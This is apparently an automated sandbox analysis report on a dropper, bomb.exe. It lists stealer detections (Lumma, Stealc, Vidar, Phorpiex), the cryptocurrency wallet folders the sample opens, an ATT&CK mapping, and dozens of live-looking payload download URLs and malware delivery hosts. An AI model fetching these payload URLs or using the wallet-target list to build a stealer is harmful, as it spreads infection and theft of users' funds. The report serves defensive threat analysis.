Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 6916, type: MEMORYSTR

Remote Access Functionality

Yara detected Go Injector

Source: Yara match	File source: 00000032.00000002.3173981696.00007FF70072D000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.2113906593.00007FF70072D000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2651263420.000001342F7AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bomb.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: 49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.32a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.3250000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.3250000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3020983924.0000000003250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Phorpiex

Source: Yara match	File source: 26.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.323057790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.323057790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.http185.215.113.66newtpp.exe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.http185.215.113.66newtpp.exe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.0.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.sysvplervcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1958409377.0000000000410000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000000.2071621421.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1851991589.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.4201400872.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1947158859.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.1978134558.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1882503312.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.1919322254.0000000000410000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2003396502.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1947093681.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2096751492.0000000000410000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1908225903.0000000000410000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1911911144.000000000067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: http185.215.113.66newtpp.exe.exe PID: 5660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvplervcs.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 323057790.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvplervcs.exe PID: 7872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvplervcs.exe PID: 6656, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\323057790.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Windows\sysvplervcs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\sysvplervcs.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match

File source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.38b5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.38b5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1910895960.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1890590465.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.f08ae0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe.f08ae0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6916, type: MEMORYSTR

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,	4_2_00401470
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,	4_2_00402020
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,	4_2_0040E190
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread,	4_2_004013B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE6410 bind,WSAGetLastError,	8_2_67BE6410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE63C0 PR_Bind,	8_2_67BE63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67B722D0 sqlite3_bind_blob,	8_2_67B722D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE60B0 listen,WSAGetLastError,	8_2_67BE60B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BEC030 sqlite3_bind_parameter_count,	8_2_67BEC030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE6070 PR_Listen,	8_2_67BE6070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BEC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	8_2_67BEC050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE8EA0 sqlite3_clear_bindings,	8_2_67BE8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CC0D60 sqlite3_bind_parameter_name,	8_2_67CC0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CC0C40 sqlite3_bind_zeroblob,	8_2_67CC0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CC0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	8_2_67CC0B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE9480 sqlite3_bind_null,	8_2_67BE9480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE94F0 sqlite3_bind_text16,	8_2_67BE94F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE94C0 sqlite3_bind_text,	8_2_67BE94C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE9400 sqlite3_bind_int64,	8_2_67BE9400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE9380 sqlite3_bind_int,	8_2_67BE9380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67BE92E0 sqlite3_bind_double,	8_2_67BE92E0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	31 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	11 Windows Service	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	11 Windows Service	512 Process Injection	4 Obfuscated Files or Information	1 Credentials in Registry	1 System Network Connections Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	13 Software Packing	NTDS	4 File and Directory Discovery	Distributed Component Object Model	11 Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	88 System Information Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	331 Masquerading	DCSync	381 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	51 Virtualization/Sandbox Evasion	Proc Filesystem	51 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	512 Process Injection	/etc/passwd and /etc/shadow	14 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	1 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bomb.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.Marsilia
bomb.exe	79%	Virustotal		Browse
bomb.exe	100%	Avira	TR/Agent_AGen.krlrd

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\GHJDBAKEHD.exe	100%	Avira	HEUR/AGEN.1310458
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe	100%	Avira	HEUR/AGEN.1360619
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\a43486128347[1].exe	100%	Avira	HEUR/AGEN.1310458
C:\ProgramData\GHJDBAKEHD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1037419404.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\a43486128347[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sql[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1037419404.exe	96%	ReversingLabs	Win32.Worm.Phorpiex
C:\Users\user\AppData\Local\Temp\1534331641.exe	62%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\400445\Batch.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\454830019.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.InjectorX
C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	45%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	88%	ReversingLabs	Win32.Worm.Phorpiex
C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	13%	ReversingLabs
C:\Users\user\Desktop\http77.105.161.194filecarrier_ratecon.exe.exe	0%	ReversingLabs
C:\Users\user\Desktop\http77.105.161.194pdffile.exe.exe	11%	ReversingLabs
C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66d5ca151a052_stealcuniq.exe.exe	88%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	79%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe	79%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66eb0d09c9f08_Gads.exe.exe	83%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe	71%	ReversingLabs	Win64.Trojan.LummaStealer
C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f13c8ec4580_uninstaller.exe.exe	83%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe	61%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\Desktop\httpmales.mugutu.comlopsa66dc99a997229_VirtualLibrary.exe.exe	79%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\Desktop\httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe	83%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	92%	ReversingLabs	Win32.Trojan.Stealc
C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe	92%	ReversingLabs	ByteCode-MSIL.Spyware.Lummastealer
C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	75%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\httpmales.mugutu.comyuop66cf535e3dcf9_BitcoinCore.exe.exe	61%	ReversingLabs	Win64.Trojan.Casdet
C:\Users\user\Desktop\httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe	58%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\Desktop\httpmales.mugutu.comyuop66d5edf357fbf_BitcoinCore.exe.exe	71%	ReversingLabs	Win64.Backdoor.Zegost
C:\Users\user\Desktop\httpmales.mugutu.comyuop66e096a0354a7_Burn.exe.exe	71%	ReversingLabs	Win32.Trojan.Stealc
C:\Users\user\Desktop\httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe	83%	ReversingLabs	Win32.Trojan.Privateloader

Source	Detection	Scanner	Label	Link
https://steamcommunity.com/profiles/76561199780418869	100%	URL Reputation	malware
stamppreewntnq.shop	100%	URL Reputation	phishing
http://107.172.31.13/normal.jpeg	0%	Virustotal		Browse
http://115.63.118.113:55446/bin.sh	4%	Virustotal		Browse
http://94.156.66.26/i686	8%	Virustotal		Browse
http://91.92.253.151/ISIS.sh	5%	Virustotal		Browse
http://94.156.66.26/sh4	8%	Virustotal		Browse
http://117.221.254.141:38701/bin.sh	3%	Virustotal		Browse
http://182.127.113.67:39674/Mozi.m	10%	Virustotal		Browse
http://222.142.72.194:45127/bin.sh	12%	Virustotal		Browse
http://113.231.81.158:48718/Mozi.m	3%	Virustotal		Browse
http://61.3.22.18:58740/Mozi.m	3%	Virustotal		Browse
http://117.235.73.178:32784/bin.sh	7%	Virustotal		Browse
http://117.235.124.41:34700/i	9%	Virustotal		Browse
http://115.62.159.148:54296/bin.sh	6%	Virustotal		Browse
http://154.216.18.223/ppc	4%	Virustotal		Browse
http://59.95.90.100:46492/bin.sh	2%	Virustotal		Browse
http://94.156.66.26/go.sh	7%	Virustotal		Browse
http://117.255.109.168:39313/i	2%	Virustotal		Browse
http://117.208.29.24:35004/Mozi.m	6%	Virustotal		Browse
http://222.137.17.110:54555/Mozi.m	12%	Virustotal		Browse
http://91.92.253.151/a-r.m-7.ISIS	5%	Virustotal		Browse
http://114.218.89.83:57737/i	10%	Virustotal		Browse
http://59.99.142.205:48152/i	5%	Virustotal		Browse
http://117.235.241.243:56887/Mozi.m	2%	Virustotal		Browse
http://59.93.191.162:57582/i	3%	Virustotal		Browse
http://117.210.182.106:46567/Mozi.m	7%	Virustotal		Browse
http://94.156.66.26/mips	16%	Virustotal		Browse
http://59.91.86.216:58581/i	8%	Virustotal		Browse
http://59.184.252.30:39594/bin.sh	7%	Virustotal		Browse
http://42.5.82.213:60756/bin.sh	3%	Virustotal		Browse
http://59.92.65.160:50482/Mozi.m	4%	Virustotal		Browse
http://222.139.78.17:42446/i	7%	Virustotal		Browse
http://117.255.96.106:35990/i	5%	Virustotal		Browse
http://117.196.170.210:38008/Mozi.a	4%	Virustotal		Browse
http://94.156.66.26/i586	8%	Virustotal		Browse
http://61.3.151.106:41663/bin.sh	7%	Virustotal		Browse
http://59.93.227.73:55045/bin.sh	6%	Virustotal		Browse
http://182.119.181.181:39311/bin.sh	16%	Virustotal		Browse
http://117.206.74.0:38931/i	3%	Virustotal		Browse
http://222.138.19.160:33132/bin.sh	4%	Virustotal		Browse
http://117.248.170.35:43845/bin.sh	14%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199780418869	true	URL Reputation: malware	unknown
stamppreewntnq.shop	true	URL Reputation: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.66.26/i686	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	8%, Virustotal, Browse	unknown
http://115.63.118.113:55446/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse	unknown
http://107.172.31.13/normal.jpeg	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://113.231.81.158:48718/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
http://61.3.22.18:58740/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
http://91.92.253.151/ISIS.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	5%, Virustotal, Browse	unknown
http://94.156.66.26/sh4	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	8%, Virustotal, Browse	unknown
http://117.255.109.168:39313/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://117.221.254.141:38701/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
http://182.127.113.67:39674/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse	unknown
http://117.235.124.41:34700/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	9%, Virustotal, Browse	unknown
http://222.142.72.194:45127/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	12%, Virustotal, Browse	unknown
http://114.218.89.83:57737/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse	unknown
http://117.235.73.178:32784/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse	unknown
http://115.62.159.148:54296/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	6%, Virustotal, Browse	unknown
http://154.216.18.223/ppc	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse	unknown
http://59.95.90.100:46492/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://91.92.253.151/a-r.m-7.ISIS	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	5%, Virustotal, Browse	unknown
http://94.156.66.26/go.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse	unknown
http://117.235.241.243:56887/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://117.208.29.24:35004/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	6%, Virustotal, Browse	unknown
http://59.184.252.30:39594/bin.sh	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse	unknown
http://222.137.17.110:54555/Mozi.m	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	12%, Virustotal, Browse	unknown
http://59.99.142.205:48152/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	5%, Virustotal, Browse	unknown
http://94.156.66.26/mips	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	16%, Virustotal, Browse	unknown
http://222.139.78.17:42446/i	bomb.exe, 00000000.00000002.2651263420.00000134301AE000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse	unknown
